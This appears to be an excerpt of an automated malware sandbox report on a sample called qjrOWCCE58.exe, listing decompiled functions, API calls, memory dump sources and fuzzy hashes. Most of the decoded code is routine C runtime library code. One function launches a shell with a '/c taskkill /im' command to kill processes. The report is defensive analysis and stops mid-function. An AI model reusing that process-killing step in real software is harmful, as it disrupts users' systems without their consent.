0x00418bef
0x00000000
0x00000000
0x00000000
0x00000000
0x00418bc0
0x00418bc0
0x00418bc0
0x00418bc3
0x00418bc4
0x00418bc4
0x00000000
0x00418bc0
0x00418bb0
0x00000000
0x00418bb0
0x00418b88
0x00418b88
0x00418b89
0x00418b8e
0x00418b90
0x00418b92
0x00418b97
0x00418b97
0x00000000
0x00418b97
0x00418b59
0x00418b5e
0x00418b60
0x00418b61
0x00000000
0x00418b61
0x00418b23
0x00418b26
0x00000000
0x00000000
0x00000000
0x00418b26
0x00418ada
0x00418add
0x00000000
0x00000000
0x00418adf
0x00418ae6
0x00418ae7
0x00418ae9
0x00418aee
0x00000000
0x00418aee
0x00000000

Strings

C:\Users\user\Desktop\qjrOWCCE58.exe, xrefs: 00418B00, 00418B07, 00418B3D
p3U, xrefs: 00418B0E

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\qjrOWCCE58.exe$p3U
API String ID: 0-3305354427
Opcode ID: 0a98df6e0d14f241440e8354d5f19b9cdf2b907de123fd20f5b14c2944752898
Instruction ID: cd12658a55dfea62e60d71ff82f5bd3d1bb78566c84dcf15e76b0e2dfc284433
Opcode Fuzzy Hash: 0a98df6e0d14f241440e8354d5f19b9cdf2b907de123fd20f5b14c2944752898
Instruction Fuzzy Hash: 1B4151B1A04219AFCB11DB9998C19DFBBB8EF85314F10406FF504A7351DB78AA81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00838D24 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

p3U, xrefs: 00838D75
C:\Users\user\Desktop\qjrOWCCE58.exe, xrefs: 00838D67, 00838D6E, 00838DA4

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\qjrOWCCE58.exe$p3U
API String ID: 0-3305354427
Opcode ID: 0a98df6e0d14f241440e8354d5f19b9cdf2b907de123fd20f5b14c2944752898
Instruction ID: 591dc63f7609f5656972638f1a485ddab2acde6b9c4fce452f4bbcee002cbab7
Opcode Fuzzy Hash: 0a98df6e0d14f241440e8354d5f19b9cdf2b907de123fd20f5b14c2944752898
Instruction Fuzzy Hash: 6D416BB1A00318EBCB25AF9DDC819AEBBB8FBD9710F144466F504E7251DF708A41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00830637 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00830676
__IsNonwritableInCurrentImage.LIBCMT ref: 0083072A

Strings

@, xrefs: 0083071C, 00830725, 00830736
csm, xrefs: 00830714

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm$@
API String ID: 3480331319-241803511
Opcode ID: b948bcbac638f1370441953e1e5c1243e38c2fc6996c81172dd2bada455f1ac1
Instruction ID: d871bb7a294d16b1255f484ea823594e2d62cebc1b91846c494b0be983d115d9
Opcode Fuzzy Hash: b948bcbac638f1370441953e1e5c1243e38c2fc6996c81172dd2bada455f1ac1
Instruction Fuzzy Hash: 5941BF30A00208DBCF14DF68C895AAEBBB0FF85318F148155E914EB396D736AA15CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00420045 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00420045(void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t36;
				signed int _t40;
				int _t43;
				intOrPtr _t55;
				int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				short* _t60;

				_t30 =  *0x43b054; // 0x41d6575c
				_v8 = _t30 ^ _t58;
				E00411E11( &_v32, _t55, _a4);
				_t48 = _a24;
				if(_a24 == 0) {
					_t48 =  *((intOrPtr*)(_v28 + 8));
				}
				_t56 = 0;
				_t36 = E0041E618(_t48, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_t60 = _t59 + 0x18;
				_v16 = _t36;
				if(_t36 == 0) {
					L16:
					if(_v20 != 0) {
						 *(_v32 + 0x350) =  *(_v32 + 0x350) & 0xfffffffd;
					}
					return E0040D3AF(_t56, _t48, _v8 ^ _t58, _t55, _t56, _t57);
				} else {
					_t55 = _t36 + _t36;
					_v12 = _t55;
					asm("sbb eax, eax");
					_t40 = _t36 & _t55 + 0x00000008;
					if(_t40 == 0) {
						_t57 = 0;
						L12:
						if(_t57 != 0) {
							E0040F2F0(_t56, _t57, _t56, _t55);
							_t43 = E0041E618(_t48, 1, _a12, _a16, _t57, _v16);
							if(_t43 != 0) {
								_t56 = GetStringTypeW(_a8, _t57, _t43, _a20);
							}
						}
						E0040D391(_t57);
						goto L16;
					}
					if(_t40 > 0x400) {
						_t57 = E0041D4FF(_t40);
						if(_t57 == 0) {
							L10:
							_t55 = _v12;
							goto L12;
						}
						 *_t57 = 0xdddd;
						L9:
						_t57 =  &(_t57[4]);
						goto L10;
					}
					E0040DD70(_t40);
					_t57 = _t60;
					if(_t57 == 0) {
						goto L10;
					}
					 *_t57 = 0xcccc;
					goto L9;
				}
			}

0x0042004d
0x00420054
0x00420060
0x00420065
0x0042006a
0x0042006f
0x0042006f
0x00420074
0x0042008d
0x00420092
0x00420095
0x0042009a
0x00420124
0x00420128
0x0042012d
0x0042012d
0x00420147
0x004200a0
0x004200a0
0x004200a6
0x004200ab
0x004200ad
0x004200af
0x004200e6
0x004200e8
0x004200ea
0x004200ef
0x00420101
0x0042010b
0x0042011b
0x0042011b
0x0042010b
0x0042011e
0x00000000
0x00420123
0x004200b6
0x004200d1
0x004200d6
0x004200e1
0x004200e1
0x00000000
0x004200e1
0x004200d8
0x004200de
0x004200de
0x00000000
0x004200de
0x004200b8
0x004200bd
0x004200c1
0x00000000
0x00000000
0x004200c3
0x00000000
0x004200c3

APIs

__alloca_probe_16.LIBCMT ref: 004200B8
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 00420115
__freea.LIBCMT ref: 0042011E

Part of subcall function 0041D4FF: HeapAlloc.KERNEL32(00000000,?,?,?,0040E78B,?,?,?,?,?,00401113,?,?), ref: 0041D531

Strings

D1B, xrefs: 00420058

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: AllocHeapStringType__alloca_probe_16__freea
String ID: D1B
API String ID: 324646697-3596475136
Opcode ID: 72af886525566f5ed040a39514842019c13ab3a3a819911a6353a70ac31ad621
Instruction ID: 687cda0af76e58ec24b0d9353f278e7dfc34725dfbc3977f917aa820ecb44a0e
Opcode Fuzzy Hash: 72af886525566f5ed040a39514842019c13ab3a3a819911a6353a70ac31ad621
Instruction Fuzzy Hash: 61310471A0022AABDB209F65EC41EEF7BB4EF44310F44412AFC04A7252D7398C51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00824F37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(0043B054), ref: 00824F63

Part of subcall function 00824E97: OpenProcess.KERNEL32(00000410,00000000), ref: 00824EC2
Part of subcall function 00824E97: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00824EDD
Part of subcall function 00824E97: CloseHandle.KERNEL32(00000000), ref: 00824EE4

GetCurrentProcessId.KERNEL32 ref: 00824F7F

Part of subcall function 00824D97: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00824DF7
Part of subcall function 00824D97: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 00824E14
Part of subcall function 00824D97: K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 00824E31
Part of subcall function 00824D97: CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00824E38

ShellExecuteA.SHELL32(00000000,00000000,00437AA0,00000000,00000000,00000000), ref: 00825020

Strings

/c taskkill /im ", xrefs: 00824F93

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileModulesShell
String ID: /c taskkill /im "
API String ID: 3296006795-2842225094
Opcode ID: a4f0c6a810a418c4990140bfd7cba20f646f349032eef6c8cd59db318adc44f6
Instruction ID: a35e4bf9020a972d1f245d2c47e7f9d442f031700b453e687dac71aeef35d8d6
Opcode Fuzzy Hash: a4f0c6a810a418c4990140bfd7cba20f646f349032eef6c8cd59db318adc44f6
Instruction Fuzzy Hash: 39215E30A04258EBCB10F7A8DC56BEDB7B4FF14700F90416AA145E31A1EF742A49CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00823EA7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00823F36

Part of subcall function 0082EEA2: RaiseException.KERNEL32(E06D7363,00000001,00000003,00821423,?,?,?,00821423,?,00439F24), ref: 0082EF02

Strings

ios_base::eofbit set, xrefs: 00823EEB
ios_base::failbit set, xrefs: 00823EE6
ios_base::badbit set, xrefs: 00823EDC

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: b68c2b98412cd3d6dc889fc751f0ede2ea5194cad47bf89cd3df0d6e006d2c99
Instruction ID: 358106ce141f275a61faf0ce63354dba78d9a9a7e4275b19f539a7a1ab92f64f
Opcode Fuzzy Hash: b68c2b98412cd3d6dc889fc751f0ede2ea5194cad47bf89cd3df0d6e006d2c99
Instruction Fuzzy Hash: 23113FB15043046BC720DF58E812B9AB3D8FF45310F14C91BF955D7680E778EA44C755

Uniqueness

Uniqueness Score: -1.00%

Function 0083DB70 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0083DBFA

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 666d1fca7fc551800c5f7099e7c6ff3dc46109fc598f1019b727dd8204721721
Instruction ID: ac8a4b33730dbc39300639d70dc954ea437bfb5607c54456d512f4c48c7ec46e
Opcode Fuzzy Hash: 666d1fca7fc551800c5f7099e7c6ff3dc46109fc598f1019b727dd8204721721
Instruction Fuzzy Hash: 05B113729003899FDB158F28D881BAEBBB5FF95350F2541A9E844EF342D6749D02CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 004106AB Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E004106AB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x439840);
				E0040E1D0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E0040ECB0(_t107, E0040E90F(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E0040ECB0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x43c568; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x42c218();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00418419(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x439860);
									E0040E1D0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E004106AB(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E004113AB(_t103, _t108[0x18], E0040E90F( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E004113BB(_t103, _t108[0x18], E0040E90F( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E0040E90F();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x004106ab
0x004106ad
0x004106b2
0x004106b7
0x004106b9
0x004106bc
0x004106c1
0x004107d1
0x004107d1
0x004107d1
0x00000000
0x004106d0
0x004106d0
0x004106d5
0x004106df
0x004106e1
0x004106e6
0x004106eb
0x004106eb
0x004106ed
0x004106f0
0x004106f5
0x00410717
0x00410717
0x0041071a
0x0041071d
0x0041073b
0x0041073e
0x0041077d
0x00410780
0x00410783
0x004107a8
0x004107aa
0x00000000
0x004107ac
0x004107ac
0x004107ae
0x00000000
0x004107b0
0x004107b0
0x004107b5
0x004107b9
0x004107b9
0x004107ba
0x00000000
0x004107ba
0x004107ae
0x00410785
0x00410785
0x00410787
0x00000000
0x00410789
0x00410789
0x0041078b
0x00000000
0x0041078d
0x0041079e
0x00000000
0x004107a3
0x0041078b
0x00410787
0x00410740
0x00410740
0x00410744
0x00000000
0x0041074a
0x0041074a
0x0041074c
0x00000000
0x00410752
0x00410759
0x00410761
0x00410765
0x00410767
0x0041076a
0x0041076f
0x00410770
0x00000000
0x00410770
0x0041076a
0x00000000
0x00410765
0x0041074c
0x00410744
0x0041071f
0x0041071f
0x00000000
0x0041071f
0x004106fc
0x004106fc
0x00410701
0x00410706
0x00000000
0x00410708
0x0041070a
0x00410713
0x00410722
0x00410724
0x004107e3
0x004107e3
0x004107e8
0x004107e9
0x004107eb
0x004107f0
0x004107f5
0x004107f8
0x004107fb
0x004107fe
0x00410807
0x00410807
0x00410800
0x00410800
0x00410800
0x0041080a
0x0041080e
0x00410811
0x00410812
0x00410813
0x00410814
0x00410817
0x00410820
0x00410820
0x00410823
0x00410859
0x00410825
0x00410825
0x00410825
0x00410828
0x0041083f
0x0041083f
0x00410828
0x0041085e
0x00410868
0x00410874
0x00410732
0x00410732
0x00410737
0x00410738
0x00410772
0x00410779
0x004107bd
0x004107bd
0x004107c4
0x004107d3
0x004107d6
0x004107e2
0x004107e2
0x00410724
0x00410706
0x00000000
0x00000000
0x00000000
0x004106d5

APIs

___AdjustPointer.LIBCMT ref: 00410772
___AdjustPointer.LIBCMT ref: 00410795
___AdjustPointer.LIBCMT ref: 00410831

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 305f80d29b89edf87e903bdb4f08490518f84e922ce2e7fc6942411cfcaf8061
Instruction ID: 70ee914bc58a55865700202c371ede9c2a7753f49160f716243b9dc9fbc0b893
Opcode Fuzzy Hash: 305f80d29b89edf87e903bdb4f08490518f84e922ce2e7fc6942411cfcaf8061
Instruction Fuzzy Hash: E051E072605206AFEB289F11D845BEAB3A4EF04314F24452FE821576D1E7B9FCD1CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00830912 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 008309D9
___AdjustPointer.LIBCMT ref: 008309FC
___AdjustPointer.LIBCMT ref: 00830A98

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ad91fd826b6b0f99e31fe2c8094995b3b43abd288ea9ad5e355f4042ebbdbfb3
Instruction ID: 235730be8ef76a23dfba2dd29257f932150ff2a7ab0e961d45dc64a7c98d4b6c
Opcode Fuzzy Hash: ad91fd826b6b0f99e31fe2c8094995b3b43abd288ea9ad5e355f4042ebbdbfb3
Instruction Fuzzy Hash: 4751F372600326AFEB289F54E461B7A77A4FF94710F244029EC45DB692D731AC81CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00429B0E Relevance: 6.1, APIs: 4, Instructions: 132
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00429B0E(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E00429AC1( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E00411DE1(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E0041B928(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E00423D82(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E0041B928(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E00411DE1(__eflags))) = 0xd;
						_t36 = E00411DCE(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E0041CA2B(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E004196AA(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E0041F7F8(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E00411DCE(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E00411DE1(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E00411DE1(_t70)));
										E0041CA88(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E004196AA(_t56, _t50, _v12);
							E0041CA88(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E00411DE1(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x00429b0e
0x00429b17
0x00429b26
0x00429b34
0x00429c5d
0x00429c62
0x00000000
0x00429b49
0x00429b49
0x00429b4c
0x00429b4f
0x00429b52
0x00429b54
0x00429c19
0x00429c22
0x00429c29
0x00429c2c
0x00429c2f
0x00000000
0x00000000
0x00429c3f
0x00429c41
0x00429be6
0x00429be6
0x00429c64
0x00429c6f
0x00429c7d
0x00429c7d
0x00429c48
0x00429c4e
0x00429c5b
0x00000000
0x00429c5b
0x00429b5a
0x00429b70
0x00429b73
0x00429b74
0x00429b76
0x00429b91
0x00429b94
0x00429b97
0x00429b98
0x00429b98
0x00429b9a
0x00429bad
0x00429bad
0x00429baf
0x00429bb2
0x00429bb7
0x00429bba
0x00429bbd
0x00429bef
0x00429bf2
0x00429bf9
0x00429bf9
0x00429bff
0x00429c05
0x00429c07
0x00000000
0x00429c0c
0x00429bbf
0x00429bc0
0x00429bc2
0x00429bc5
0x00429bc7
0x00429bca
0x00429bcc
0x00429ba6
0x00429ba6
0x00000000
0x00429ba6
0x00429bce
0x00000000
0x00000000
0x00000000
0x00429bce
0x00429b9c
0x00000000
0x00000000
0x00429b9e
0x00429ba4
0x00000000
0x00000000
0x00000000
0x00429bd0
0x00429bd0
0x00429bd0
0x00429bd8
0x00429bde
0x00429be3
0x00000000
0x00429be3
0x00429b7d
0x00000000
0x00429c0f
0x00429c0f
0x00429c11
0x00000000
0x00000000
0x00429c13
0x00000000
0x00000000
0x00429c15
0x00429c17
0x00000000
0x00000000
0x00000000
0x00429c17
0x00429b5a

APIs

_free.LIBCMT ref: 00429BDE
_free.LIBCMT ref: 00429C07
SetEndOfFile.KERNEL32(00000000,00426DDC,00000000,0041C8C8,?,?,?,?,?,?,?,00426DDC,0041C8C8,00000000), ref: 00429C39
GetLastError.KERNEL32(?,?,?,?,?,?,?,00426DDC,0041C8C8,00000000,?,?,?,?,00000000), ref: 00429C55

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 4cffee1493270454d0933f4762f188abb0293e1357704477d9a3f1206c381cf0
Instruction ID: 146180473a67fc178ee1ea47d6f376e75b47f0d00cdd081845e5442c7d7dde6e
Opcode Fuzzy Hash: 4cffee1493270454d0933f4762f188abb0293e1357704477d9a3f1206c381cf0
Instruction Fuzzy Hash: 6C41E972B006159BDB116BB6FC85BDE3BA9BF44364F54011BF514A7291DA3CEC81872C

Uniqueness

Uniqueness Score: -1.00%

Function 00849D75 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00849E45
_free.LIBCMT ref: 00849E6E
SetEndOfFile.KERNEL32(00000000,00847043,00000000,0083CB2F,?,?,?,?,?,?,?,00847043,0083CB2F,00000000), ref: 00849EA0
GetLastError.KERNEL32(?,?,?,?,?,?,?,00847043,0083CB2F,00000000,?,?,?,?,00000000), ref: 00849EBC

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 4cffee1493270454d0933f4762f188abb0293e1357704477d9a3f1206c381cf0
Instruction ID: cd2ea84888e80c28398ee87f5c9482e1fd18e7aa21a132a90a6180d250db5a45
Opcode Fuzzy Hash: 4cffee1493270454d0933f4762f188abb0293e1357704477d9a3f1206c381cf0
Instruction Fuzzy Hash: 9E41B132900608ABDB31EBBCCC42B9F7765FF84360F240914F594E72A1EAB4DC5487A2

Uniqueness

Uniqueness Score: -1.00%

Function 0042233F Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042233F(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E0041E864(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E0041E864(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00411DAB(GetLastError());
									_t19 =  *((intOrPtr*)(E00411DE1(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E00422905(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00411DAB(GetLastError());
						return  *((intOrPtr*)(E00411DE1(__eflags)));
					}
					_t41 = _a8;
